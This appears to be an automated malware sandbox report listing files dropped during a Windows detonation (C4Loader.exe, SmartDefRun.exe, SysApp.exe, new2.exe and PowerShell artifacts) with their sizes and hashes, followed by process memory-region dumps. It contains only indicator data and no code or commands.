                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        d85ba6ff808d9e5444a4b369f5bc2730

                        SHA1

                        31aa9d96590fff6981b315e0b391b575e4c0804a

                        SHA256

                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                        SHA512

                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        19KB

                        MD5

                        0c106e7d93d26d325ba6eb0d4ae5f591

                        SHA1

                        22b4e0f6d3a9807dab67e43eaf865422f3bdbfe8

                        SHA256

                        0d31627c2340ff23d8cd655a0efa06e67e36c143d539c867f2f640303b28c359

                        SHA512

                        43daa3c8e2623af5c828a6d2ad8acd8c54657a285356faf7027d215a5af79bfe13ef3e0341687912df740559b617f03e00ed03c5c9cfa1b8e50a4af96444efe8

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        948B

                        MD5

                        a7ce8cefc3f798abe5abd683d0ef26dd

                        SHA1

                        b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

                        SHA256

                        5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

                        SHA512

                        c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

                      • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                        Filesize

                        1.4MB

                        MD5

                        bcaae53dc3d930c6ed4642e945fab93d

                        SHA1

                        ba3391fb65a312431432dc2339abadce73c0d81a

                        SHA256

                        6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

                        SHA512

                        9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

                      • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                        Filesize

                        1.4MB

                        MD5

                        bcaae53dc3d930c6ed4642e945fab93d

                        SHA1

                        ba3391fb65a312431432dc2339abadce73c0d81a

                        SHA256

                        6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

                        SHA512

                        9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

                      • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                        Filesize

                        1.4MB

                        MD5

                        bcaae53dc3d930c6ed4642e945fab93d

                        SHA1

                        ba3391fb65a312431432dc2339abadce73c0d81a

                        SHA256

                        6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

                        SHA512

                        9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

                      • C:\Users\Admin\AppData\Local\Temp\RzLNTXYeUCWKsXbGyRAOmBTvKSJfjzaL

                        Filesize

                        2KB

                        MD5

                        8c7576873886d730d55e52070f35fea0

                        SHA1

                        cf8b732cb49dad4e69c8948a6f0b7b87b9b0ccf1

                        SHA256

                        06b631bf6ea97d79ea2215efa0323aab64bd1b53283ef8640c2a8fd37cac9caa

                        SHA512

                        374dff92bb31dfb74ec66084dcc8764e166f4adc7c57113d813b430e420b8bcc9e1300aae5f4b2ff09ad3d5b152a8240901ed3acfc76c4788d9ad3442cd2db28

                      • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                        Filesize

                        3.7MB

                        MD5

                        619c8d3ebd09bd86a6faa527354e08d5

                        SHA1

                        315b4f87c419a3ff24c62951c59e8089150846eb

                        SHA256

                        3827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45

                        SHA512

                        5aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a

                      • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                        Filesize

                        3.7MB

                        MD5

                        619c8d3ebd09bd86a6faa527354e08d5

                        SHA1

                        315b4f87c419a3ff24c62951c59e8089150846eb

                        SHA256

                        3827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45

                        SHA512

                        5aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a

                      • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                        Filesize

                        3.7MB

                        MD5

                        619c8d3ebd09bd86a6faa527354e08d5

                        SHA1

                        315b4f87c419a3ff24c62951c59e8089150846eb

                        SHA256

                        3827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45

                        SHA512

                        5aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a

                      • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                        Filesize

                        1.4MB

                        MD5

                        b6bbab9f72c88d07b484cc339c475e75

                        SHA1

                        f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                        SHA256

                        dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                        SHA512

                        1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                      • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                        Filesize

                        1.4MB

                        MD5

                        b6bbab9f72c88d07b484cc339c475e75

                        SHA1

                        f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                        SHA256

                        dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                        SHA512

                        1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                      • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                        Filesize

                        1.4MB

                        MD5

                        b6bbab9f72c88d07b484cc339c475e75

                        SHA1

                        f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                        SHA256

                        dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                        SHA512

                        1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ah0w32mr.e4g.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • C:\Users\Admin\AppData\Local\Temp\nJObCsNVlgTeMaPEZQleQYhYzRyWJjPj

                        Filesize

                        72KB

                        MD5

                        5aeeafe26d1e0441647e0b0d7b880c81

                        SHA1

                        45a00f65a99d1cec35bd6a21891ac469a86f451c

                        SHA256

                        c94d79620e27865ba796be4cbfd98087da8a47f78e07e7220084de05354381dd

                        SHA512

                        3e70b065b194f14f1ec2735b6003943b492c29a78e12029ae42574cda7fdc785c24eae0c98fbd9a1167ac938387d78aead68688299e3aaf1971794938ab903c5

                      • C:\Users\Admin\AppData\Local\Temp\new2.exe

                        Filesize

                        3.0MB

                        MD5

                        50d48404f9b93a16c69aed2e6c585192

                        SHA1

                        3f949a4b96bac4f7e1cec881edb5b65295410a1c

                        SHA256

                        0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

                        SHA512

                        0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

                      • C:\Users\Admin\AppData\Local\Temp\new2.exe

                        Filesize

                        3.0MB

                        MD5

                        50d48404f9b93a16c69aed2e6c585192

                        SHA1

                        3f949a4b96bac4f7e1cec881edb5b65295410a1c

                        SHA256

                        0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

                        SHA512

                        0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

                      • C:\Users\Admin\AppData\Local\Temp\new2.exe

                        Filesize

                        3.0MB

                        MD5

                        50d48404f9b93a16c69aed2e6c585192

                        SHA1

                        3f949a4b96bac4f7e1cec881edb5b65295410a1c

                        SHA256

                        0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

                        SHA512

                        0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

                      • memory/432-410-0x00000260F2CC0000-0x00000260F2CE7000-memory.dmp

                        Filesize

                        156KB

                      • memory/432-363-0x00007FFB14BD0000-0x00007FFB14BE0000-memory.dmp

                        Filesize

                        64KB

                      • memory/432-362-0x00000260F2CC0000-0x00000260F2CE7000-memory.dmp

                        Filesize

                        156KB

                      • memory/576-344-0x00007FFB14BD0000-0x00007FFB14BE0000-memory.dmp

                        Filesize

                        64KB

                      • memory/576-343-0x0000024B03EA0000-0x0000024B03EC7000-memory.dmp

                        Filesize

                        156KB

                      • memory/576-341-0x0000024B03E70000-0x0000024B03E91000-memory.dmp

                        Filesize

                        132KB

                      • memory/576-348-0x0000024B03EA0000-0x0000024B03EC7000-memory.dmp

                        Filesize

                        156KB

                      • memory/652-345-0x000001C94F360000-0x000001C94F387000-memory.dmp

                        Filesize

                        156KB

                      • memory/652-351-0x000001C94F360000-0x000001C94F387000-memory.dmp

                        Filesize

                        156KB

                      • memory/652-349-0x00007FFB14BD0000-0x00007FFB14BE0000-memory.dmp

                        Filesize

                        64KB

                      • memory/680-367-0x0000018533AC0000-0x0000018533AE7000-memory.dmp

                        Filesize

                        156KB

                      • memory/680-415-0x0000018533AC0000-0x0000018533AE7000-memory.dmp

                        Filesize

                        156KB

                      • memory/680-369-0x00007FFB14BD0000-0x00007FFB14BE0000-memory.dmp

                        Filesize

                        64KB

                      • memory/940-357-0x00007FFB14BD0000-0x00007FFB14BE0000-memory.dmp

                        Filesize

                        64KB

                      • memory/940-355-0x0000020C31CD0000-0x0000020C31CF7000-memory.dmp

                        Filesize

                        156KB

                      • memory/1016-354-0x00000240BC470000-0x00000240BC497000-memory.dmp

                        Filesize

                        156KB

                      • memory/1016-358-0x00007FFB14BD0000-0x00007FFB14BE0000-memory.dmp

                        Filesize

                        64KB

                      • memory/1016-359-0x00000240BC470000-0x00000240BC497000-memory.dmp

                        Filesize

                        156KB

                      • memory/1040-422-0x00000213B61B0000-0x00000213B61D7000-memory.dmp

                        Filesize

                        156KB

                      • memory/1040-376-0x00007FFB14BD0000-0x00007FFB14BE0000-memory.dmp

                        Filesize

                        64KB

                      • memory/1040-372-0x00000213B61B0000-0x00000213B61D7000-memory.dmp

                        Filesize

                        156KB

                      • memory/1056-373-0x000001EB65690000-0x000001EB656B7000-memory.dmp

                        Filesize

                        156KB

                      • memory/1056-375-0x00007FFB14BD0000-0x00007FFB14BE0000-memory.dmp

                        Filesize

                        64KB

                      • memory/1056-426-0x000001EB65690000-0x000001EB656B7000-memory.dmp

                        Filesize

                        156KB

                      • memory/1064-432-0x00000210644F0000-0x0000021064517000-memory.dmp

                        Filesize

                        156KB

                      • memory/1064-374-0x00000210644F0000-0x0000021064517000-memory.dmp

                        Filesize

                        156KB

                      • memory/1064-377-0x00007FFB14BD0000-0x00007FFB14BE0000-memory.dmp

                        Filesize

                        64KB

                      • memory/1156-436-0x000001BCFBF70000-0x000001BCFBF97000-memory.dmp

                        Filesize

                        156KB

                      • memory/1156-382-0x000001BCFBF70000-0x000001BCFBF97000-memory.dmp

                        Filesize

                        156KB

                      • memory/1156-383-0x00007FFB14BD0000-0x00007FFB14BE0000-memory.dmp

                        Filesize

                        64KB

                      • memory/1228-387-0x000002500E130000-0x000002500E157000-memory.dmp

                        Filesize

                        156KB

                      • memory/1228-389-0x00007FFB14BD0000-0x00007FFB14BE0000-memory.dmp

                        Filesize

                        64KB

                      • memory/1228-441-0x000002500E130000-0x000002500E157000-memory.dmp

                        Filesize

                        156KB

                      • memory/1240-445-0x000001E229B20000-0x000001E229B47000-memory.dmp

                        Filesize

                        156KB

                      • memory/1240-393-0x00007FFB14BD0000-0x00007FFB14BE0000-memory.dmp

                        Filesize

                        64KB

                      • memory/1240-390-0x000001E229B20000-0x000001E229B47000-memory.dmp

                        Filesize

                        156KB

                      • memory/1836-252-0x00007FF72AED0000-0x00007FF72AEF9000-memory.dmp

                        Filesize

                        164KB

                      • memory/2476-331-0x0000000140000000-0x0000000140029000-memory.dmp

                        Filesize

                        164KB

                      • memory/2476-336-0x00007FFB54B50000-0x00007FFB54D45000-memory.dmp

                        Filesize

                        2.0MB

                      • memory/2476-337-0x00007FFB54030000-0x00007FFB540EE000-memory.dmp

                        Filesize

                        760KB

                      • memory/2476-338-0x0000000140000000-0x0000000140029000-memory.dmp

                        Filesize

                        164KB

                      • memory/2476-335-0x0000000140000000-0x0000000140029000-memory.dmp

                        Filesize

                        164KB

                      • memory/2512-315-0x0000027E56060000-0x0000027E56070000-memory.dmp

                        Filesize

                        64KB

                      • memory/2512-330-0x00007FFB54030000-0x00007FFB540EE000-memory.dmp

                        Filesize

                        760KB

                      • memory/2512-329-0x00007FFB54B50000-0x00007FFB54D45000-memory.dmp

                        Filesize

                        2.0MB

                      • memory/2512-328-0x0000027E56060000-0x0000027E56070000-memory.dmp

                        Filesize

                        64KB

                      • memory/2512-316-0x0000027E56060000-0x0000027E56070000-memory.dmp

                        Filesize

                        64KB

                      • memory/3376-178-0x00000000048D0000-0x00000000048E0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3376-171-0x00000000073D0000-0x00000000073EA000-memory.dmp

                        Filesize

                        104KB

                      • memory/3376-136-0x0000000004890000-0x00000000048C6000-memory.dmp

                        Filesize

                        216KB

                      • memory/3376-137-0x0000000004F10000-0x0000000005538000-memory.dmp

                        Filesize

                        6.2MB

                      • memory/3376-138-0x00000000048D0000-0x00000000048E0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3376-139-0x00000000048D0000-0x00000000048E0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3376-140-0x00000000055B0000-0x00000000055D2000-memory.dmp

                        Filesize

                        136KB

                      • memory/3376-141-0x0000000005720000-0x0000000005786000-memory.dmp

                        Filesize

                        408KB

                      • memory/3376-142-0x0000000005800000-0x0000000005866000-memory.dmp

                        Filesize

                        408KB

                      • memory/3376-152-0x0000000005E30000-0x0000000005E4E000-memory.dmp

                        Filesize

                        120KB

                      • memory/3376-216-0x00000000048D0000-0x00000000048E0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3376-153-0x0000000006400000-0x0000000006432000-memory.dmp

                        Filesize

                        200KB

                      • memory/3376-154-0x0000000070490000-0x00000000704DC000-memory.dmp

                        Filesize

                        304KB

                      • memory/3376-164-0x00000000063E0000-0x00000000063FE000-memory.dmp

                        Filesize

                        120KB

                      • memory/3376-179-0x00000000048D0000-0x00000000048E0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3376-165-0x00000000048D0000-0x00000000048E0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3376-174-0x00000000083D0000-0x0000000008974000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/3376-173-0x00000000074E0000-0x0000000007502000-memory.dmp

                        Filesize

                        136KB

                      • memory/3376-172-0x00000000073C0000-0x00000000073C8000-memory.dmp

                        Filesize

                        32KB

                      • memory/3376-166-0x00000000077A0000-0x0000000007E1A000-memory.dmp

                        Filesize

                        6.5MB

                      • memory/3376-170-0x0000000007380000-0x000000000738E000-memory.dmp

                        Filesize

                        56KB

                      • memory/3376-169-0x0000000007410000-0x00000000074A6000-memory.dmp

                        Filesize

                        600KB

                      • memory/3376-168-0x00000000071D0000-0x00000000071DA000-memory.dmp

                        Filesize

                        40KB

                      • memory/3376-167-0x0000000007150000-0x000000000716A000-memory.dmp

                        Filesize

                        104KB

                      • memory/3532-235-0x000001B7D9F60000-0x000001B7D9F70000-memory.dmp

                        Filesize

                        64KB

                      • memory/3532-247-0x000001B7D9F60000-0x000001B7D9F70000-memory.dmp

                        Filesize

                        64KB

                      • memory/3532-236-0x000001B7D9F60000-0x000001B7D9F70000-memory.dmp

                        Filesize

                        64KB

                      • memory/3656-251-0x00007FF6BB0E0000-0x00007FF6BB4A0000-memory.dmp

                        Filesize

                        3.8MB

                      • memory/3980-133-0x0000000000400000-0x000000000040F000-memory.dmp

                        Filesize

                        60KB

                      • memory/3980-135-0x0000000000400000-0x000000000040F000-memory.dmp

                        Filesize

                        60KB

                      • memory/4404-317-0x00000000040C0000-0x00000000040D0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4404-318-0x00000000040C0000-0x00000000040D0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4708-218-0x000002AA9D580000-0x000002AA9D590000-memory.dmp

                        Filesize

                        64KB

                      • memory/4708-228-0x000002AA9D490000-0x000002AA9D4B2000-memory.dmp

                        Filesize

                        136KB

                      • memory/4708-217-0x000002AA9D580000-0x000002AA9D590000-memory.dmp

                        Filesize

                        64KB

                      • memory/5072-208-0x0000000005770000-0x000000000577A000-memory.dmp

                        Filesize

                        40KB

                      • memory/5072-201-0x0000000005220000-0x00000000052B2000-memory.dmp

                        Filesize

                        584KB

                      • memory/5072-199-0x0000000000830000-0x000000000099C000-memory.dmp

                        Filesize

                        1.4MB